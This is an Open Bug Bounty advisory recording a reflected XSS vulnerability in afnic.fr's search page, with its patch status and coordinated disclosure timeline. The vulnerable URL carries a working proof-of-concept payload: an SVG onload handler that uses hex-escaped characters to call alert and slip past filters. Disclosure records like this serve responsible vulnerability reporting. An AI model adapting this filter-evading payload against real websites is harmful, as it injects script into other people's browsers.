afnic.fr XSS vulnerability

2016-03-08T20:38:00
ID OBB:140336
Type openbugbounty
Reporter garodensetzu
Modified 2017-01-31T13:54:00

Description

Vulnerable URL:
https://www.afnic.fr/fr/resultat-de-la-recherche?search[sort]=score&search;[keyword]=%3Csvg%20onload=%27a=window;a[%22\x61\x6c\x65\x72\x74%22]%28/XSSPOSED/%29%27&submit;=Rechercher
Details:

Description| Value
---|---
Patched:| Yes, at 30.01.2017
Latest check for patch:| 30.01.2017 20:38 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 162951
Google Pagerank| 7
VIP website status:| Yes
Check afnic.fr SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 8 March, 2016 20:38 GMT
Generic security notifications sent to website owner| 8 March, 2016 20:41 GMT
Vulnerability details disclosed by researcher| 31 May, 2016 21:11 GMT
Vulnerability patched by the website owner| 31 January, 2017 13:54 GMT